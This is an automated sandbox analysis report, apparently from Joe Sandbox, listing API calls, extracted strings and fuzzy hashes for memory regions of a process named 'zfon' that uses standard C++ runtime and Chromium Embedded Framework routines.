                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: Xlength_error@std@@memcpy
                                                                                                • String ID: string too long
                                                                                                • API String ID: 237780522-2556327735
                                                                                                • Opcode ID: 6cc9c3de7402aa3eda63dc3cfcc9be082f1e203825f314b7ca0c0bae42979206
                                                                                                • Instruction ID: d69d028503bf0fcecc8e7cd7579d88f6e634cdd9b159b8df49a244880f4a2a50
                                                                                                • Opcode Fuzzy Hash: 6cc9c3de7402aa3eda63dc3cfcc9be082f1e203825f314b7ca0c0bae42979206
                                                                                                • Instruction Fuzzy Hash: FD31BF31B08A4180EF14AF1AE944569A232EB48FD4F884135DE7E07BDDDF2ED491839A
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _errnoisspace
                                                                                                • String ID: +
                                                                                                • API String ID: 607103254-2126386893
                                                                                                • Opcode ID: ceb648361af4a40464abd6bb96d21510e563132ef184305b88ba731e0678b504
                                                                                                • Instruction ID: 1d2fb01f6a6af1e40dd08c71c3fbdd999073e4424c8be8e6b050e201814033df
                                                                                                • Opcode Fuzzy Hash: ceb648361af4a40464abd6bb96d21510e563132ef184305b88ba731e0678b504
                                                                                                • Instruction Fuzzy Hash: 3321B221F09A9A81FE669F2DE55427CAAD1AB54BD0F594039DF6D83790DE3CD8839300
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Name::operator+
                                                                                                • String ID: void$void
                                                                                                • API String ID: 2943138195-3746155364
                                                                                                • Opcode ID: 97d3235dbf24bda01b6dbd3d7bde98b4578176fb3c7ca11f2c57902aac5691c6
                                                                                                • Instruction ID: 256b16f68ca512b4685168fef67914be78d16ae6eb6250b55c8ff61e60617d1d
                                                                                                • Opcode Fuzzy Hash: 97d3235dbf24bda01b6dbd3d7bde98b4578176fb3c7ca11f2c57902aac5691c6
                                                                                                • Instruction Fuzzy Hash: 8C311562E18A569CFB01CFA8E8600FC77B4BB48788B940136EF4E62B59DF3CA144C750
                                                                                                APIs
                                                                                                  • Part of subcall function 00007FF7F96E2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E25C3
                                                                                                  • Part of subcall function 00007FF7F96E2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E25D3
                                                                                                  • Part of subcall function 00007FF7F96E2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E25E3
                                                                                                  • Part of subcall function 00007FF7F96E2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E25F0
                                                                                                • cef_string_map_alloc.LIBCEF ref: 00007FF7F96E2B8F
                                                                                                • cef_string_map_alloc.LIBCEF ref: 00007FF7F96E2BDA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$cef_string_map_alloc
                                                                                                • String ID: text/html
                                                                                                • API String ID: 3856544966-3872744991
                                                                                                • Opcode ID: 888e6c1b3f1e3331f613257842be11fd7939f225599eba024fbb2b563b5733c6
                                                                                                • Instruction ID: 0540b33be286a63b7075eeb3063cf3f7f8f0bceba4aeb381890502054f47dec8
                                                                                                • Opcode Fuzzy Hash: 888e6c1b3f1e3331f613257842be11fd7939f225599eba024fbb2b563b5733c6
                                                                                                • Instruction Fuzzy Hash: C2314D62608B4581EB50AF15E880269B732FBC8BE8F949221E6AD43AECCF2CC545C754
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: cef_string_map_alloc
                                                                                                • String ID: 11d15b06c9fb87a76f83ad5fe91f22eb03edbef5
                                                                                                • API String ID: 3041573648-612978255
                                                                                                • Opcode ID: 7073bd34756768840e07731e4de828ad42ddd1829c919e3ef5f2fd825d233364
                                                                                                • Instruction ID: f11c4be7be2c00459fa95bc2c95995ba30f0e0744b6d8b20d7e8c34b74b63f5e
                                                                                                • Opcode Fuzzy Hash: 7073bd34756768840e07731e4de828ad42ddd1829c919e3ef5f2fd825d233364
                                                                                                • Instruction Fuzzy Hash: 97218B62B08B41C1DB44DF2AE880169A7B1FB88FC4B588036DB5E837A8DF28C495C350
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Winerror_messagememcpymemmovememsetstd::_
                                                                                                • String ID: unknown error
                                                                                                • API String ID: 3480822978-3078798498
                                                                                                • Opcode ID: 98119a2c876a1c59b561851f97c996c2cff6274175daffcd9d743103a7d01bdb
                                                                                                • Instruction ID: 416e2d1cabe49680688a4044d142d9ffb7b645903a127a6521d81a236acf68ec
                                                                                                • Opcode Fuzzy Hash: 98119a2c876a1c59b561851f97c996c2cff6274175daffcd9d743103a7d01bdb
                                                                                                • Instruction Fuzzy Hash: B421DE22A28AE691EB189F2DD50927D73A1EB41FC8F589130CB2D073D9EF7CE151A340
                                                                                                APIs
                                                                                                • ?_Xout_of_range@std@@YAXPEBD@Z.MSVCP140(?,?,?,00007FF7F96E307B), ref: 00007FF7F96E327D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Xout_of_range@std@@
                                                                                                • String ID: invalid string position
                                                                                                • API String ID: 1960685668-1799206989
                                                                                                • Opcode ID: 39bc57a7c996044000b8f0ac340acb9529ebaab51d3efb8f16ee4a635c87aee7
                                                                                                • Instruction ID: 05d38e7e1a2ae28b06aa300238e4183c89943face1cd57bac718f7a628c74331
                                                                                                • Opcode Fuzzy Hash: 39bc57a7c996044000b8f0ac340acb9529ebaab51d3efb8f16ee4a635c87aee7
                                                                                                • Instruction Fuzzy Hash: 7121A462B18B8981EF48AF1EF9845686361EB58FC4FD84130CB6D07799DF3EE4918394
                                                                                                APIs
                                                                                                  • Part of subcall function 00007FF7F96E2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E25C3
                                                                                                  • Part of subcall function 00007FF7F96E2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E25D3
                                                                                                  • Part of subcall function 00007FF7F96E2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E25E3
                                                                                                  • Part of subcall function 00007FF7F96E2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E25F0
                                                                                                • cef_string_map_alloc.LIBCEF ref: 00007FF7F96FEEC5
                                                                                                • cef_string_map_alloc.LIBCEF ref: 00007FF7F96FEEFD
                                                                                                Strings
                                                                                                • if (__scInternalExt && __scInternalExt.CustomScrollbar) { new __scInternalExt.CustomScrollbar().activate();}, xrefs: 00007FF7F96FEE6B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$cef_string_map_alloc
                                                                                                • String ID: if (__scInternalExt && __scInternalExt.CustomScrollbar) { new __scInternalExt.CustomScrollbar().activate();}
                                                                                                • API String ID: 3856544966-1929393026
                                                                                                • Opcode ID: 8e5c3c177139f802837b7980348f181a94c747ff7433c4aeb07622180e720b4f
                                                                                                • Instruction ID: e89f2a8a7ee87a71e9483e90a27752e2bbc76694df46d5556819ab794d7d1b62
                                                                                                • Opcode Fuzzy Hash: 8e5c3c177139f802837b7980348f181a94c747ff7433c4aeb07622180e720b4f
                                                                                                • Instruction Fuzzy Hash: 8D217162609B8581EB51AF14E84436AAB71FBC5BD4F989231EBAD03AEDDF3CC444C750
                                                                                                APIs
                                                                                                  • Part of subcall function 00007FF7F96E2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E25C3
                                                                                                  • Part of subcall function 00007FF7F96E2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E25D3
                                                                                                  • Part of subcall function 00007FF7F96E2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E25E3
                                                                                                  • Part of subcall function 00007FF7F96E2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E25F0
                                                                                                • cef_string_map_alloc.LIBCEF ref: 00007FF7F96FEFB5
                                                                                                • cef_string_map_alloc.LIBCEF ref: 00007FF7F96FEFED
                                                                                                Strings
                                                                                                • if (__scInternalExt && __scInternalExt.DisableTextSelect) { __scInternalExt.DisableTextSelect();}, xrefs: 00007FF7F96FEF5B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$cef_string_map_alloc
                                                                                                • String ID: if (__scInternalExt && __scInternalExt.DisableTextSelect) { __scInternalExt.DisableTextSelect();}
                                                                                                APIs
                                                                                                  • Part of subcall function 00007FF8B9115920: _lock_locales.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B911592F
                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00007FF8B90EACBC
                                                                                                • _CxxThrowException.VCRUNTIME140 ref: 00007FF8B90EACCD
                                                                                                  • Part of subcall function 00007FF8B90F5E20: setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90F5DA0
                                                                                                  • Part of subcall function 00007FF8B90F5E20: setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90F5DB2
                                                                                                  • Part of subcall function 00007FF8B90F5E20: setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90F5E3B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: setlocale$ExceptionThrow_lock_localesstd::invalid_argument::invalid_argument
                                                                                                • String ID: bad locale name
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: Xlength_error@std@@
                                                                                                • String ID: gfffffff$vector<T> too long
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: Xout_of_range@std@@memmove
                                                                                                • String ID: invalid string position
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: FileHeader$ExceptionRaise
                                                                                                • String ID: Access violation - no RTTI data!$Bad dynamic_cast!
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549530455.00007FF8BFAD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8BFAD0000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                                • String ID: csm
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                                • String ID: csm
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: __std_exception_copyrand_s
                                                                                                • String ID: invalid random_device value
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: ExceptionThrow__std_exception_copystd::invalid_argument::invalid_argument
                                                                                                • String ID: bad function call
                                                                                                APIs
                                                                                                  • Part of subcall function 00007FF8BFB56E48: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF8BFB529EE), ref: 00007FF8BFB56E56
                                                                                                • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BFB5F48A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: abortterminate
                                                                                                • String ID: csm$f
                                                                                                APIs
                                                                                                • _W_Getdays.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF8B90ED40D
                                                                                                  • Part of subcall function 00007FF8B90EB710: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF8B90FC445), ref: 00007FF8B90EB739
                                                                                                  • Part of subcall function 00007FF8B90EB710: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF8B90FC445), ref: 00007FF8B90EB768
                                                                                                  • Part of subcall function 00007FF8B90EB710: memcpy.VCRUNTIME140(?,?,00000000,00007FF8B90FC445), ref: 00007FF8B90EB77F
                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B90ED42A
                                                                                                Strings
                                                                                                • :Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday, xrefs: 00007FF8B90ED435
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: free$Getdaysmallocmemcpy
                                                                                                • String ID: :Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
                                                                                                • API String ID: 1347072587-3283725177
                                                                                                • Opcode ID: 35240cb5f5100ad4a6dbdd5295e329d3b5d0df92d6cb6440ee87cb48881eb460
                                                                                                • Instruction ID: 9f112bebb3934ae2b68ac2c733ef7f8c903aeaa85f33138911183ff3f6d1b9c8
                                                                                                • Opcode Fuzzy Hash: 35240cb5f5100ad4a6dbdd5295e329d3b5d0df92d6cb6440ee87cb48881eb460
                                                                                                • Instruction Fuzzy Hash: DFE03921B18B82A2EE149F1AF5442682370EF08BD0F880134DB0D03B50EF3CE4A48310
                                                                                                APIs
                                                                                                • _W_Getmonths.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF8B90ED45D
                                                                                                  • Part of subcall function 00007FF8B90EB710: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF8B90FC445), ref: 00007FF8B90EB739
                                                                                                  • Part of subcall function 00007FF8B90EB710: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF8B90FC445), ref: 00007FF8B90EB768
                                                                                                  • Part of subcall function 00007FF8B90EB710: memcpy.VCRUNTIME140(?,?,00000000,00007FF8B90FC445), ref: 00007FF8B90EB77F
                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B90ED47A
                                                                                                Strings
                                                                                                • :Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:Dece, xrefs: 00007FF8B90ED485
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: free$Getmonthsmallocmemcpy
                                                                                                • String ID: :Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:Dece
                                                                                                • API String ID: 1628830074-2030377133
                                                                                                • Opcode ID: c82f8f9ad4e2d2af623f2a64a55ac3353b2c765cd361e64e07e7ab3c08dd46ed
                                                                                                • Instruction ID: f0e8f8d4a671ae56aa31a49a57d923024351419750fbe850cf608bdb7fd88813
                                                                                                • Opcode Fuzzy Hash: c82f8f9ad4e2d2af623f2a64a55ac3353b2c765cd361e64e07e7ab3c08dd46ed
                                                                                                • Instruction Fuzzy Hash: 74E03226A19B82A2EE409F1AF5883682360FF08BD4F882034DB0E03B50DF3CE4A48300
                                                                                                APIs
                                                                                                • _Getdays.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF8B90ECCDD
                                                                                                  • Part of subcall function 00007FF8B90EB690: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF8B90F84D4), ref: 00007FF8B90EB6B2
                                                                                                  • Part of subcall function 00007FF8B90EB690: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF8B90F84D4), ref: 00007FF8B90EB6D8
                                                                                                  • Part of subcall function 00007FF8B90EB690: memcpy.VCRUNTIME140(?,?,?,00007FF8B90F84D4), ref: 00007FF8B90EB6F0
                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B90ECCFA
                                                                                                Strings
                                                                                                • :Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday, xrefs: 00007FF8B90ECD05
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: free$Getdaysmallocmemcpy
                                                                                                • String ID: :Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
                                                                                                • API String ID: 1347072587-3283725177
                                                                                                • Opcode ID: 4369f42fca7dce3118de04e163d293b9be384bdf3f2632a8f01c906decda58a8
                                                                                                • Instruction ID: 1be3f2788db27d614da4953796360cf77b224dc8655593cf6aabe20b77ff123c
                                                                                                • Opcode Fuzzy Hash: 4369f42fca7dce3118de04e163d293b9be384bdf3f2632a8f01c906decda58a8
                                                                                                • Instruction Fuzzy Hash: A1E0C922A18B82A2EE049F1AF5453A96361EF48BC0F888434DB2D46755EF3CE4A4C300
                                                                                                APIs
                                                                                                • _Getmonths.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF8B90ECD4D
                                                                                                  • Part of subcall function 00007FF8B90EB690: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF8B90F84D4), ref: 00007FF8B90EB6B2
                                                                                                  • Part of subcall function 00007FF8B90EB690: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF8B90F84D4), ref: 00007FF8B90EB6D8
                                                                                                  • Part of subcall function 00007FF8B90EB690: memcpy.VCRUNTIME140(?,?,?,00007FF8B90F84D4), ref: 00007FF8B90EB6F0
                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B90ECD6A
                                                                                                Strings
                                                                                                • :Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December, xrefs: 00007FF8B90ECD75
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: free$Getmonthsmallocmemcpy
                                                                                                • String ID: :Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December
                                                                                                • API String ID: 1628830074-4232081075
                                                                                                • Opcode ID: db95abb9d15dbef39e6ee0859203eea4f630d3aba3162c7ecd3a84709e9a22e3
                                                                                                • Instruction ID: 767cf0326a54f3c4872c626ab141ffae7ecf344c2e8c24f08c4aacd82e87a3b1
                                                                                                • Opcode Fuzzy Hash: db95abb9d15dbef39e6ee0859203eea4f630d3aba3162c7ecd3a84709e9a22e3
                                                                                                • Instruction Fuzzy Hash: BEE0C921A18B82A2EE009F1AF5442696370EF58BD0F844435DB1D06795DF3CE5E5C340
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionThrowstd::bad_alloc::bad_alloc
                                                                                                • String ID: Unknown exception
                                                                                                • API String ID: 932687459-410509341
                                                                                                • Opcode ID: bc4d1c003b6ff2fe4e2c4e9266720bee0507f32f91a828decfd6544b21c815df
                                                                                                • Instruction ID: 33ef33fa99a0d901c00a695fea8fba57d503c3f8bfcef742c5bd201dd5733619
                                                                                                • Opcode Fuzzy Hash: bc4d1c003b6ff2fe4e2c4e9266720bee0507f32f91a828decfd6544b21c815df
                                                                                                • Instruction Fuzzy Hash: 9FD01722A29A8691EF10EF04DC813A8E330FB94348FD45432D16C825B9EF6DDA56C3A0
                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF8BFAD3325,?,?,?,?,00007FF8BFAD41CA,?,?,?,?,?), ref: 00007FF8BFAD3483
                                                                                                • SetLastError.KERNEL32(?,?,?,00007FF8BFAD3325,?,?,?,?,00007FF8BFAD41CA,?,?,?,?,?), ref: 00007FF8BFAD350B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549530455.00007FF8BFAD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8BFAD0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2549435771.00007FF8BFAD0000.00000002.00000001.01000000.0000000E.sdmp
